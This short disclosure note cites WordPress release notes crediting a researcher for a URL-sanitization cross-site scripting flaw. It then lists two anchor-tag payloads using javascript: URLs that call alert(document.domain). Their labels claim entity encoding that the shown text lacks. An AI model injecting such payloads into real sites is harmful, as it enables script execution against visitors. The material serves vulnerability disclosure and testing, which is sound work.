According to the WordPress release notes: “Props to Soroush Dalili (@irsdl) from NCC Group for disclosing an issue with URL sanitization that can lead to cross-site scripting (XSS) attacks.”
Thanks to @irsdl's Hacker1 disclosure:
<a href="javascript:alert(document.domain)">JS - Numerical Entities</a>
<a href="javascript:x=1;alert(document.domain)">JS - Hex Entities</a>